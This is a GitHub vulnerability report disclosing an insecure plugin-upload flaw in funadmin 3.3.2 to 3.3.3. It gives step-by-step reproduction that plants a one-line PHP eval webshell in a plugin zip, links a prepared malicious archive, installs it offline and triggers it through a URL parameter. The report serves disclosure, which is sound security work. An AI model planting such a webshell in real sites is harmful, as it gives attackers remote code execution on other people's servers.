You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
the method:localinstall doesn't check any webshell or sensitive function in file, which may cause insecure file upload.
firstly, we download a free plugin and unzip it. the rootpath of plugin is as follows:
then, we add a webshell into /public/js
content of shell: <?pup @eval($_REQUEST['shell']); ?>
after it, we zip the entire plugin
example plugin(already placed webshell): https://github.com/Leeyangee/leeya_bug/raw/main/demo.zip
Leeyangee
changed the title
Insecure file upload via plugins install in funadmin v3.3.2
Insecure file upload via plugins install in funadmin v3.3.2 - v3.3.3
Jun 13, 2023
Vulnerability Product:funadmin
Vulnerability version:.3.3.2 - 3.3.3
Vulnerability type:Insecure file upload
Vulnerability Details:
Vulnerability location app\backend\controller\Addon.php#localinstall method
the method:localinstall doesn't check any webshell or sensitive function in file, which may cause insecure file upload.
![image](https://private-user-images.githubusercontent.com/101627018/244306383-e94e28f1-9906-44c9-800c-9ea077c1292d.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTkxOTU0NDksIm5iZiI6MTcxOTE5NTE0OSwicGF0aCI6Ii8xMDE2MjcwMTgvMjQ0MzA2MzgzLWU5NGUyOGYxLTk5MDYtNDRjOS04MDBjLTllYTA3N2MxMjkyZC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNjI0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDYyNFQwMjEyMjlaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jNGI3N2I3MzI4NDBmMDNkNTg3NDJkN2NkMWE2MzY0MzMzZjI5ODIxZDE0NDc1MjY5OTdhOGIwYzZhNDA0ZTIzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.Shqj-nT0oyEBQL2t5UVsRCmnIml1BuvamfsuUzlFxjo)
![image](https://private-user-images.githubusercontent.com/101627018/244308956-ee140674-cf60-41a4-90df-665b4741208f.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTkxOTU0NDksIm5iZiI6MTcxOTE5NTE0OSwicGF0aCI6Ii8xMDE2MjcwMTgvMjQ0MzA4OTU2LWVlMTQwNjc0LWNmNjAtNDFhNC05MGRmLTY2NWI0NzQxMjA4Zi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNjI0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDYyNFQwMjEyMjlaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1hMjYyZDQ0ZThmZWIwMDFkNTUzM2Y0YTYyMDkyMDdiMjVmZDQ5ZjZlYTUwNDk1ZmU0MmE3MzU0Y2MxZDFmYWRjJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.8UvaxNjz0bAe9Vx70QGimBTRD7WFyFVNnVtMavnRNbM)
![image](https://private-user-images.githubusercontent.com/101627018/244309030-d6fe4341-9997-4839-b571-b638f0b8c0ff.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTkxOTU0NDksIm5iZiI6MTcxOTE5NTE0OSwicGF0aCI6Ii8xMDE2MjcwMTgvMjQ0MzA5MDMwLWQ2ZmU0MzQxLTk5OTctNDgzOS1iNTcxLWI2MzhmMGI4YzBmZi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNjI0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDYyNFQwMjEyMjlaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT05NzgzMjdmYTlkMjY4YTQyNGE3YmQ1MzE5Mjk0OWEzN2MwNGRjZWNkZmFjODA4ZWQwNDYyNWM0ZjE0OGVjYTI5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.X1idnPEpk1STwlD75hfxk6TqGtlJSU6d_ErilfB13LQ)
![image](https://private-user-images.githubusercontent.com/101627018/244309189-92764d69-3e9a-4a56-9e95-d287636e7209.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTkxOTU0NDksIm5iZiI6MTcxOTE5NTE0OSwicGF0aCI6Ii8xMDE2MjcwMTgvMjQ0MzA5MTg5LTkyNzY0ZDY5LTNlOWEtNGE1Ni05ZTk1LWQyODc2MzZlNzIwOS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNjI0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDYyNFQwMjEyMjlaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yMGY1N2ZiNWY0MWIxNjk1OTFjOWM3YjU0NDk0MDIzYTJiMzA2NzUxOGVjYmNjNjdkYTc5OGU4YmI4YmY0NGEzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.R_JsSae6s4xsrJPhhi6lKzG3RoQaOiVdQz2Pt9QU0t0)
firstly, we download a free plugin and unzip it. the rootpath of plugin is as follows:
then, we add a webshell into /public/js
content of shell:
<?pup @eval($_REQUEST['shell']); ?>
after it, we zip the entire plugin
example plugin(already placed webshell): https://github.com/Leeyangee/leeya_bug/raw/main/demo.zip
finally, we just find a website uses funadmin v3.3.2, visit: http://localhost/backend/index/index.html, click "install offline" "离线安装"
![image](https://private-user-images.githubusercontent.com/101627018/244309767-06b666db-2a1e-4261-aa00-29bf7ce2ffa9.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTkxOTU0NDksIm5iZiI6MTcxOTE5NTE0OSwicGF0aCI6Ii8xMDE2MjcwMTgvMjQ0MzA5NzY3LTA2YjY2NmRiLTJhMWUtNDI2MS1hYTAwLTI5YmY3Y2UyZmZhOS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNjI0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDYyNFQwMjEyMjlaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0wZjA4N2Y5ZGVlOTJiYWEwNGFhNjUxNmJlYTVjYzM1ZTliNWNiYzJlMzY2YzU4NjdhMzdjYzY1MWVhYTM2ZWQ1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.tv2PjXW-jDQaeHXu7b6_M3HDU_iShXzplGErPRowUqc)
![image](https://private-user-images.githubusercontent.com/101627018/244311274-55c119fc-e7a2-4319-a125-38d5f9aeb22e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTkxOTU0NDksIm5iZiI6MTcxOTE5NTE0OSwicGF0aCI6Ii8xMDE2MjcwMTgvMjQ0MzExMjc0LTU1YzExOWZjLWU3YTItNDMxOS1hMTI1LTM4ZDVmOWFlYjIyZS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNjI0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDYyNFQwMjEyMjlaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zMWMzOTNjNzZmODA5NDU5OTUxNzQ5MzkwOWM4NGNlOGQ0OTRmYWRkMmI4MWZlMGNhOGI5YmZlOTlmYzBjNTdjJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.gcHWMyE7-OBGXbCsj8sp5Wj3rSL0P0jEIPZa7kLSA3Y)
and select the plugin we just zipped, after installed , visit http://localhost/static/demo/js/shell.php?shell=phpinfo();
Proof that this has been uploaded webshell via plugins install
Discoverer:leeya_bug
The text was updated successfully, but these errors were encountered: